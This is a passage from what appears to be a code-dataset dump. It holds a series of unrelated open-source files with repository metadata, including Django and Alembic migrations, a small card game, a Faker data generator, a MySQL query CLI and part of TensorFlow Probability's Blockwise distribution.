#db.session.add(user)
#db.session.commit()
print "success"
except Exception as e:
f = open('/tmp/error.log', 'w')
f.write(e.message)
f.close()
return 'done'
return 'done2'
""" | bsd-3-clause | -4,215,876,279,390,760,000 | 30.77907 | 113 | 0.635798 | false | 3.571242 | false | false | false |
nikhila05/MicroSite | micro_blog/migrations/0001_initial.py | 1 | 4172 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogComments',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('email', models.EmailField(max_length=255)),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(default=b'off', max_length=3, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=20)),
('slug', models.CharField(unique=True, max_length=20)),
('description', models.CharField(max_length=500)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Image_File',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('upload', models.FileField(upload_to=b'static/uploads/%Y/%m/%d/')),
('date_created', models.DateTimeField(default=datetime.datetime.now)),
('is_image', models.BooleanField(default=True)),
('thumbnail', models.FileField(null=True, upload_to=b'static/uploads/%Y/%m/%d/', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateField(auto_now=True)),
('content', models.TextField()),
('featured_image', models.CharField(max_length=400, null=True, blank=True)),
('featured_post', models.CharField(default=b'off', max_length=4, blank=True)),
('status', models.CharField(blank=True, max_length=2, choices=[(b'D', b'Draft'), (b'P', b'Published'), (b'T', b'Rejected')])),
('category', models.ForeignKey(to='micro_blog.Category')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tags',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=20)),
('slug', models.CharField(unique=True, max_length=20)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='post',
name='tags',
field=models.ManyToManyField(to='micro_blog.Tags', null=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='post',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
migrations.AddField(
model_name='blogcomments',
name='post',
field=models.ForeignKey(blank=True, to='micro_blog.Post', null=True),
preserve_default=True,
),
]
| gpl-2.0 | -10,623,089,563,571,604 | 39.901961 | 142 | 0.529003 | false | 4.386961 | false | false | false |
alphagov/notifications-api | migrations/versions/0083_add_perm_types_and_svc_perm.py | 1 | 2344 | """empty message
Revision ID: 0083_add_perm_types_and_svc_perm
Revises: 0082_add_go_live_template
Create Date: 2017-05-12 11:29:32.664811
"""
# revision identifiers, used by Alembic.
revision = '0083_add_perm_types_and_svc_perm'
down_revision = '0082_add_go_live_template'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
service_permission_types=op.create_table('service_permission_types',
sa.Column('name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('name'))
op.bulk_insert(service_permission_types,
[
{'name': x} for x in {
'letter',
'email',
'sms',
'international_sms',
'incoming_sms'
}
])
op.create_table('service_permissions',
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('permission', sa.String(length=255), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['permission'], ['service_permission_types.name'], ),
sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),
sa.PrimaryKeyConstraint('service_id', 'permission'))
op.create_index(op.f('ix_service_permissions_permission'), 'service_permissions', ['permission'], unique=False)
op.create_index(op.f('ix_service_permissions_service_id'), 'service_permissions', ['service_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_service_permissions_service_id'), table_name='service_permissions')
op.drop_index(op.f('ix_service_permissions_permission'), table_name='service_permissions')
op.drop_table('service_permissions')
op.drop_table('service_permission_types')
# ### end Alembic commands ###
| mit | -4,852,084,235,956,907,000 | 43.226415 | 115 | 0.579352 | false | 4.193202 | false | false | false |
lidaobing/itcc | itcc/ccs2/solvent_caflisch.py | 1 | 3718 | import pkg_resources
import math
from itcc import tools
ff_cache = {}
caflisch_dat = None
r_probe = 1.4
pij_bonded = 0.8875
pij_nonbonded = 0.3516
class Caflisch(object):
def __init__(self, data):
self.data = data
assert len(self.data) == 5
def _r_min(self):
return self.data[1]
def _r(self):
return self.data[2]
def _p(self):
return self.data[3]
def _sigma(self):
return self.data[4]
r_min = property(_r_min)
r = property(_r)
p = property(_p)
sigma = property(_sigma)
def init_caflisch():
global caflisch_dat
if caflisch_dat is not None: return
caflisch_dat = read_caflisch(
pkg_resources.resource_stream(__name__, 'caflisch.dat'))
def init_ff(forcefield):
if forcefield in ff_cache:
return
init_caflisch()
ff_cache[forcefield] = {}
res = ff_cache[forcefield]
ifname = forcefield + "-caflisch.dat"
ifile = pkg_resources.resource_stream(__name__, ifname)
for line in tools.conffile(ifile):
ff_type, cal_type = (int(x) for x in line.split())
if ff_type in res:
raise RuntimeError("duplicate type")
if cal_type != 0:
res[ff_type] = caflisch_dat[cal_type]
else:
res[ff_type] = None
def solvent_caflisch(mol, forcefield, debug=0):
if mol.connect is None:
raise RuntimeError("can't deal with a molecule without connectivity information")
init_ff(forcefield)
ff = ff_cache[forcefield]
data = []
for i in range(len(mol)):
if mol.atoms[i].type not in ff:
raise RuntimeError(
"no corresponding caflisch type for type %i of %s"
% (mol.atoms[i].type, forcefield))
if ff[mol.atoms[i].type] is not None:
data.append((ff[mol.atoms[i].type], mol.coords[i], i))
areas = []
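# Pairwise probabilistic estimate of the solvent-accessible surface area:
# each atom starts from its full sphere S = 4*pi*(r_i + r_probe)^2, which is
# shrunk multiplicatively by the approximate area b_ij buried by every
# neighbour within r_i + r_j + 2*r_probe, weighted by the atom parameter p
# and the bonded/non-bonded factor pij; the resulting areas are summed below
# with the per-atom sigma coefficients to give the solvation term.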
for i in range(len(data)):
ri = data[i][0].r
area = 1
S = 4 * math.pi * (ri + r_probe) * (ri + r_probe)
for j in range(len(data)):
if j == i: continue
rj = data[j][0].r
rijsq = tools.dissq(data[i][1], data[j][1])
max_r = data[i][0].r + data[j][0].r + r_probe * 2
if rijsq >= max_r * max_r:
continue
rij = math.sqrt(rijsq)
bij = math.pi * (ri + r_probe) * (max_r - rij) \
* (1 + (rj - ri) / rij)
bonded = mol.is_connect(data[i][2], data[j][2])
if bonded:
pij = pij_bonded
else:
pij = pij_nonbonded
area *= 1 - data[i][0].p * pij * bij / S
areas.append(area * S)
if debug >= 1:
for i in range(len(data)):
print data[i][2]+1, areas[i]
return sum(areas[i] * data[i][0].sigma for i in range(len(data)))
def read_caflisch(ifile):
formats = (int, str, float, float, float, float)
result = {}
for line in ifile:
line = line.strip()
if not line: continue
if line[0] == '#': continue
words = line.split()
assert len(words) == 6
words = [format(x) for format,x in zip(formats, words)]
assert words[0] not in result, "duplicates type in input file"
result[words[0]] = Caflisch(tuple(words[1:]))
return result
def main():
import sys
if len(sys.argv) != 3:
import os.path
sys.stderr.write('Usage: %s molname forcefield\n'
% os.path.basename(sys.argv[0]))
sys.exit(1)
from itcc.molecule import read
mol = read.readxyz(file(sys.argv[1]))
print solvent_caflisch(mol, sys.argv[2], 1)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,666,795,548,658,434,000 | 26.746269 | 80 | 0.537924 | false | 3.191416 | false | false | false |
anaoaktree/vcgen | vcgen/test.py | 1 | 1786 | # Copyright (c) 2011, Jay Conrod.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Jay Conrod nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL JAY CONROD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import unittest
if __name__ == '__main__':
test_names = ['test_lexer', 'test_combinators', 'test_imp_parser', 'test_eval']
suite = unittest.defaultTestLoader.loadTestsFromNames(test_names)
result = unittest.TextTestRunner().run(suite)
| mit | -2,567,668,676,885,615,600 | 54.8125 | 83 | 0.758679 | false | 4.544529 | true | false | false |
Yubico/yubiadmin-dpkg | yubiadmin/config.py | 1 | 2301 | # Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import imp
import errno
from yubiadmin import default_settings
__all__ = [
'settings'
]
SETTINGS_FILE = os.getenv('YUBIADMIN_SETTINGS',
'/etc/yubico/admin/yubiadmin.conf')
VALUES = {
#Web interface
'USERNAME': 'user',
'PASSWORD': 'pass',
'INTERFACE': 'iface',
'PORT': 'port'
}
def parse(conf, settings={}):
for confkey, settingskey in VALUES.items():
if hasattr(conf, confkey):
settings[settingskey] = getattr(conf, confkey)
return settings
settings = parse(default_settings)
dont_write_bytecode = sys.dont_write_bytecode
try:
sys.dont_write_bytecode = True
user_settings = imp.load_source('user_settings', SETTINGS_FILE)
settings = parse(user_settings, settings)
except IOError, e:
if not e.errno in [errno.ENOENT, errno.EACCES]:
raise e
finally:
sys.dont_write_bytecode = dont_write_bytecode
| bsd-2-clause | -259,948,468,104,190,900 | 32.838235 | 71 | 0.720991 | false | 4.065371 | false | false | false |
jdelgad/IRefuse | irefuse/irefuse.py | 1 | 6388 | # -*- encoding: UTF-8 -*-
"""
'I Refuse' web application.
Copyright (C) 2017 Jacob Delgado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import logging
import random
from typing import Callable, List
from irefuse.player import Players, Player
logger = logging.getLogger()
class IRefuse(object):
"""The game logic behind I Refuse."""
USER_PASSES = 1
USER_TAKES_CARD = 2
MIN_PLAYERS = 3
MAX_PLAYERS = 5
NUMBER_OF_ROUNDS = 24
MIN_CARD = 3
MAX_CARD = 36
def __init__(self):
"""Construct 'I Refuse' game object."""
self.cards = []
self.players = None
def setup(self, input_func: Callable[[], str]) -> None:
"""
Set up the card game.
:param input_func: The function to use to prompt the user with.
:return: None
"""
logger.debug("Setting up I Refuse")
self.cards = self.setup_cards()
self.players = self.setup_players(input_func)
logger.info("Game created with {} players".format(len(self.players)))
logger.debug("Cards to be used in game: {}".format(self.cards))
@staticmethod
def setup_players(input_func: Callable[[], str]) -> Players:
"""
Set up the number of players. Must be between 3-5.
:param input_func: Used for mocking input()
:return: A list of game.player.Player objects
"""
print("Enter the number of players [3-5]: ")
number_of_people_playing = int(input_func())
if number_of_people_playing < IRefuse.MIN_PLAYERS or \
number_of_people_playing > IRefuse.MAX_PLAYERS:
logger.error("Invalid number of players specified: {}"
.format(number_of_people_playing))
raise AssertionError("invalid number of players")
return Players(number_of_people_playing)
@staticmethod
def setup_cards() -> List[int]:
""":return: A list of randomized 24 cards ranging from 3-35."""
return random.sample(range(IRefuse.MIN_CARD, IRefuse.MAX_CARD),
IRefuse.NUMBER_OF_ROUNDS)
def determine_winner(self) -> List[Player]:
"""
Calculate who won. Ties can occur.
Creates a dictionary of point values to list of players with that
value. Returns the players with the lowest point value.
:return: The list of winners.
"""
player_totals = {}
for player in self.players:
if player.calculate_points() in player_totals:
player_totals[player.calculate_points()].append(player)
else:
player_totals[player.calculate_points()] = [player]
logger.info("Final results: {}".format(self.players))
sorted_totals = sorted(player_totals.keys())
return player_totals[sorted_totals[0]]
def play(self, input_func: Callable[[], str]):
"""
Coordinate how the game is played.
:param input_func: Input function to prompt the user.
:return: The list of winners after a game has been completed.
"""
max_flips = len(self.cards)
player = self.players.next_player()
for _ in range(max_flips):
card = self.flip_card()
tokens = 0
action = self.prompt_for_action(card, tokens, input_func, player)
logger.debug("Available card: {}".format(card))
while action == IRefuse.USER_PASSES:
logger.debug("{} passed on {} with {} tokens remaining"
.format(player, card, player.tokens))
tokens += 1
player.passes()
player = self.players.next_player(player)
action = self.prompt_for_action(card, tokens, input_func,
player)
player.take_card(card, tokens)
logger.debug("{} took {} and now has {} tokens".
format(player, card, player.tokens))
logger.debug("No more actions")
# TODO: command or query, but not both
return self.determine_winner()
@staticmethod
def prompt_for_action(card: int,
tokens: int,
input_func: Callable[[], str],
current_player: Player):
"""
Prompt the user for action. Return enum for user selection.
:param card: The card currently face up.
:param tokens: The amount of tokens on the face up card.
:param input_func: Prompt for user input.
:param current_player: The player whose action it is.
:return: The user selection (enum integer).
"""
# TODO: command or query, but not both
if not current_player.can_pass():
return IRefuse.USER_TAKES_CARD
action = 0
while not (action == IRefuse.USER_PASSES or
action == IRefuse.USER_TAKES_CARD):
print("\n{} it is your turn".format(current_player))
print("Available card: {}, Number of tokens: {}"
.format(card, tokens))
print("What action do you wish to perform: ")
print("{}. Pass".format(IRefuse.USER_PASSES))
print("{}. Take card".format(IRefuse.USER_TAKES_CARD))
print("------------")
print("Selection: ")
action = int(input_func())
return action
def flip_card(self) -> int:
"""
Flip the top card on the deck.
:return: The newest card to be face up.
"""
return self.cards.pop()
def serialize(self) -> str:
"""Serialize class to json string."""
return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True)
| agpl-3.0 | -3,449,111,402,710,158,300 | 35.090395 | 77 | 0.588134 | false | 4.150747 | false | false | false |
flyingSprite/spinelle | task_inventory/order_1_to_30/order_16_use_faker.py | 1 | 2553 |
""" Order 16: Use faker in python.
Generate many kinds of data with Faker
* User information
"""
from faker import Faker, Factory
class FakerGenerator(object):
"""Generate different data by this class."""
fake = None
def __init__(self, language=None):
if language:
self.fake = Factory.create(language)
else:
self.fake = Faker()
def gen_user_info(self):
user = User()
user.name = self.fake.name()
user.address = self.fake.address()
return user
def get_full_values(self):
full_values = FullValues()
full_values.address = self.fake.address()
# full_values.barcode = self.fake.barcode()
full_values.color = self.fake.safe_hex_color()
full_values.company = self.fake.company()
full_values.credit_card = self.fake.credit_card_number()
full_values.currency = self.fake.currency_code()
full_values.date_time = self.fake.date_time()
full_values.file = self.fake.file_name()
full_values.internet = self.fake.company_email()
full_values.job = self.fake.job()
full_values.lorem = self.fake.text(max_nb_chars=200)
full_values.misc = self.fake.password()
full_values.person = self.fake.name_female()
full_values.phone_number = self.fake.phone_number()
full_values.profile = self.fake.profile()
# full_values.python = self.fake.python()
full_values.ssn = self.fake.ssn()
full_values.user_agent = self.fake.user_agent()
return full_values
class FullValues(object):
address = None
barcode = None
color = None
company = None
credit_card = None
currency = None
date_time = None
file = None
internet = None
job = None
lorem = None
misc = None
person = None
phone_number = None
profile = None
python = None
ssn = None
user_agent = None
def __str__(self):
"""Get this object instance string values."""
return 'FullValues = [%s]' % ', '.join(['%s: %s' % item for item in self.__dict__.items()])
class User(object):
name = ''
address = ''
def __str__(self):
"""Get this object instance string values."""
return 'User = [%s]' % ', '.join(['%s: %s' % item for item in self.__dict__.items()])
# import logging
# gen = FakerGenerator(language='zh_CN')
# print(gen.gen_user_info().__str__())
# logging.info(gen.gen_user_info().__str__())
#
# full = gen.get_full_values()
# print(full.__str__())
| mit | 3,729,536,303,053,445,000 | 27.685393 | 99 | 0.596553 | false | 3.62642 | false | false | false |
Victory/realpython-tdd | contacts/user_contacts/views.py | 1 | 1864 | from django.shortcuts import (
render,
render_to_response)
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import DetailView
from django.core.exceptions import ValidationError
from django.views.decorators.http import require_http_methods
from user_contacts.models import (
Phone,
Person)
from user_contacts.new_contact_form import ContactForm
def home(request):
return render_to_response('home.html')
class DetailContactView(DetailView):
model = Person
template_name = 'contact.html'
@require_http_methods(["POST"])
def validate(request):
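# AJAX-style endpoint: validates a single posted field by running it through
# the matching ContactForm field's cleaning logic and returns a small JSON
# payload, either {"result":"valid"} or the joined validation error messages.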
post = request.POST
field_name = post['field_name']
field_value = post['field_value']
data_for_form = {}
data_for_form[field_name] = field_value
form = ContactForm(data_for_form)
field = form.fields[field_name]
data = field.widget.value_from_datadict(
form.data, form.files, form.add_prefix(field_name))
try:
cleaned_data = field.clean(data)
result = "valid"
except ValidationError, e:
result = '\n'.join(e.messages)
data = '{"result":"' + result + '"}'
return HttpResponse(data, content_type="text/json")
def all_contacts(request):
contacts = Phone.objects.all()
return render_to_response('all.html', {'contacts': contacts})
def add_contact(request):
person_form = ContactForm()
return render(
request,
'add.html',
{'person_form': person_form},
context_instance=RequestContext(request))
def create(request):
form = ContactForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('all/')
return render(
request,
'add.html',
{'person_form': form},
context_instance=RequestContext(request))
| mit | 4,318,323,745,429,808,600 | 24.534247 | 65 | 0.670601 | false | 3.899582 | false | false | false |
bjarnagin/manyquery | manyquery/cli.py | 1 | 1598 | import click
import csv
from manyquery.connection import Connection, MultiConnection
@click.command()
@click.option('--host', '-h', default=['ict.croptrak.com'], multiple=True,
help='Hostname. Repeatable.')
@click.option('--user', '-u', help='MySQL username')
@click.option('--password', '-p', prompt=True, hide_input=True,
help='MySQL password')
@click.option('--database', '-d', 'databases', multiple=True,
help='Databases to execute query on. Default: all. Repeatable.')
@click.option('--all-hosts', help='Executes a query on all hostnames. ' \
'Not compatible with --database option.', is_flag=True)
@click.argument('infile', type=click.File('rb'))
@click.argument('outfile')
def cli(host, user, password, databases, all_hosts, infile, outfile):
if databases and len(host) > 1:
click.echo('--database option is only available when used with a single host')
return
if all_hosts:
conn = MultiConnection(user, password)
elif len(host) > 1:
conn = MultiConnection(user, password, host=host)
else:
conn = Connection(host[0], user, password)
if databases:
conn.select_dbs(databases)
query = ''
while True:
chunk = infile.read(1024).decode('utf-8')
if not chunk:
break
query = query + chunk
query = [query.replace(char, ' ') for char in ['\n', '\t']]
with open(outfile, 'w') as f:
writer = csv.writer(f)
for row in conn.execute(query, include_fields=True):
writer.writerow(row) | mit | -4,797,792,615,372,584,000 | 34.533333 | 82 | 0.610138 | false | 3.850602 | false | false | false |
tensorflow/probability | tensorflow_probability/python/distributions/blockwise.py | 1 | 15570 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Blockwise distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import joint_distribution_sequential
from tensorflow_probability.python.distributions import kullback_leibler
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import tensorshape_util
def _is_iterable(x):
try:
_ = iter(x)
except TypeError:
return False
return True
class _Cast(distribution_lib.Distribution):
"""Utility distribution to cast inputs/outputs of another distribution."""
def __init__(self, distribution, dtype):
parameters = dict(locals())
name = 'CastTo{}'.format(dtype_util.name(dtype))
with tf.name_scope(name) as name:
self._distribution = distribution
self._dtype = dtype
super(_Cast, self).__init__(
dtype=dtype,
validate_args=distribution.validate_args,
allow_nan_stats=distribution.allow_nan_stats,
reparameterization_type=distribution.reparameterization_type,
parameters=parameters,
name=name)
def _batch_shape(self):
return self._distribution.batch_shape
def _batch_shape_tensor(self):
return self._distribution.batch_shape_tensor()
def _event_shape(self):
return self._distribution.event_shape
def _event_shape_tensor(self):
return self._distribution.event_shape_tensor()
def _sample_n(self, n, seed=None):
return tf.nest.map_structure(lambda x: tf.cast(x, self._dtype),
self._distribution.sample(n, seed))
def _log_prob(self, x):
x = tf.nest.map_structure(tf.cast, x, self._distribution.dtype)
return tf.cast(self._distribution.log_prob(x), self._dtype)
def _entropy(self):
return self._distribution.entropy()
def _mean(self):
return tf.nest.map_structure(lambda x: tf.cast(x, self._dtype),
self._distribution.mean())
@kullback_leibler.RegisterKL(_Cast, _Cast)
def _kl_blockwise_cast(d0, d1, name=None):
return d0._distribution.kl_divergence(d1._distribution, name=name) # pylint: disable=protected-access
class Blockwise(distribution_lib.Distribution):
"""Blockwise distribution.
This distribution converts a distribution or list of distributions into a
vector-variate distribution by doing a sequence of reshapes and concatenating
the results. This is particularly useful for converting `JointDistribution`
instances to vector-variate for downstream uses which can only handle
single-`Tensor` distributions.
#### Examples
Flattening a sequence of distributions:
```python
tfd = tfp.distributions
d = tfd.Blockwise(
[
tfd.Independent(
tfd.Normal(
loc=tf.zeros(4, dtype=tf.float64),
scale=1),
reinterpreted_batch_ndims=1),
tfd.MultivariateNormalTriL(
scale_tril=tf.eye(2, dtype=tf.float32)),
],
dtype_override=tf.float32,
)
x = d.sample([2, 1])
y = d.log_prob(x)
x.shape # ==> (2, 1, 4 + 2)
x.dtype # ==> tf.float32
y.shape # ==> (2, 1)
y.dtype # ==> tf.float32
d.mean() # ==> np.zeros((4 + 2,))
```
Flattening a joint distribution:
```python
tfd = tfp.distributions
Root = tfd.JointDistributionCoroutine.Root # Convenient alias.
def model():
e = yield Root(tfd.Independent(tfd.Exponential(rate=[100, 120]), 1))
g = yield tfd.Gamma(concentration=e[..., 0], rate=e[..., 1])
n = yield Root(tfd.Normal(loc=0, scale=2.))
yield tfd.Normal(loc=n, scale=g)
joint = tfd.JointDistributionCoroutine(model)
d = tfd.Blockwise(joint)
x = d.sample([2, 1])
y = d.log_prob(x)
x.shape # ==> (2, 1, 2 + 1 + 1 + 1)
x.dtype # ==> tf.float32
y.shape # ==> (2, 1)
y.dtype # ==> tf.float32
```
"""
def __init__(self,
distributions,
dtype_override=None,
validate_args=False,
allow_nan_stats=False,
name='Blockwise'):
"""Construct the `Blockwise` distribution.
Args:
distributions: Python `list` of `tfp.distributions.Distribution`
instances. All distribution instances must have the same `batch_shape`
and all must have `event_ndims==1`, i.e., be vector-variate
distributions.
dtype_override: samples of `distributions` will be cast to this `dtype`.
If unspecified, all `distributions` must have the same `dtype`.
Default value: `None` (i.e., do not cast).
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
self._distributions = distributions
if dtype_override is not None:
distributions = tf.nest.map_structure(
lambda d: _Cast(d, dtype_override), distributions)
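# Each component is wrapped in _Cast so that samples share the overriding
# dtype and log_prob inputs are cast back to each component's native dtype.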
if _is_iterable(distributions):
self._distribution = (
joint_distribution_sequential.JointDistributionSequential(
list(distributions)))
else:
self._distribution = distributions
# Need to cache these for JointDistributions as the batch shape of that
# distribution can change after `_sample` calls.
self._cached_batch_shape_tensor = self._distribution.batch_shape_tensor()
self._cached_batch_shape = self._distribution.batch_shape
if dtype_override is not None:
dtype = dtype_override
else:
dtype = set(
dtype_util.base_dtype(dtype)
for dtype in tf.nest.flatten(self._distribution.dtype)
if dtype is not None)
if len(dtype) == 0: # pylint: disable=g-explicit-length-test
dtype = tf.float32
elif len(dtype) == 1:
dtype = dtype.pop()
else:
raise TypeError(
'Distributions must have same dtype; found: {}.'.format(
self._distribution.dtype))
reparameterization_type = set(
tf.nest.flatten(self._distribution.reparameterization_type))
reparameterization_type = (
reparameterization_type.pop() if len(reparameterization_type) == 1
else reparameterization.NOT_REPARAMETERIZED)
super(Blockwise, self).__init__(
dtype=dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=reparameterization_type,
parameters=parameters,
name=name)
@property
def distributions(self):
return self._distributions
@property
def experimental_is_sharded(self):
any_is_sharded = any(
d.experimental_is_sharded for d in self.distributions)
all_are_sharded = all(
d.experimental_is_sharded for d in self.distributions)
if any_is_sharded and not all_are_sharded:
raise ValueError('`Blockwise.distributions` sharding must match.')
return all_are_sharded
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
return dict(
distributions=parameter_properties.BatchedComponentProperties(
event_ndims=(
lambda self: [0 for _ in self.distributions])))
def _batch_shape(self):
return functools.reduce(tensorshape_util.merge_with,
tf.nest.flatten(self._cached_batch_shape),
tf.TensorShape(None))
def _batch_shape_tensor(self):
# We could get partial static-ness by swapping in values from
# `self.batch_shape`, however this would require multiple graph ops.
return tf.nest.flatten(self._cached_batch_shape_tensor)[0]
def _event_shape(self):
event_sizes = tf.nest.map_structure(tensorshape_util.num_elements,
self._distribution.event_shape)
if any(r is None for r in tf.nest.flatten(event_sizes)):
return tf.TensorShape([None])
return tf.TensorShape([sum(tf.nest.flatten(event_sizes))])
def _event_shape_tensor(self):
event_sizes = tf.nest.map_structure(tensorshape_util.num_elements,
self._distribution.event_shape)
if any(s is None for s in tf.nest.flatten(event_sizes)):
event_sizes = tf.nest.map_structure(
lambda static_size, shape_tensor: # pylint: disable=g-long-lambda
(tf.reduce_prod(shape_tensor)
if static_size is None else static_size),
event_sizes,
self._distribution.event_shape_tensor())
return tf.reduce_sum(tf.nest.flatten(event_sizes))[tf.newaxis]
def _flatten_and_concat_event(self, x):
def _reshape_part(part, event_shape):
part = tf.cast(part, self.dtype)
static_rank = tf.get_static_value(ps.rank_from_shape(event_shape))
if static_rank == 1:
return part
new_shape = ps.concat([
ps.shape(part)[:ps.size(ps.shape(part)) - ps.size(event_shape)], [-1]
],
axis=-1)
return tf.reshape(part, ps.cast(new_shape, tf.int32))
if all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(self._distribution.event_shape)):
x = tf.nest.map_structure(_reshape_part, x,
self._distribution.event_shape)
else:
x = tf.nest.map_structure(_reshape_part, x,
self._distribution.event_shape_tensor())
return tf.concat(tf.nest.flatten(x), axis=-1)
def _split_and_reshape_event(self, x):
event_tensors = self._distribution.event_shape_tensor()
splits = [
ps.maximum(1, ps.reduce_prod(s))
for s in tf.nest.flatten(event_tensors)
]
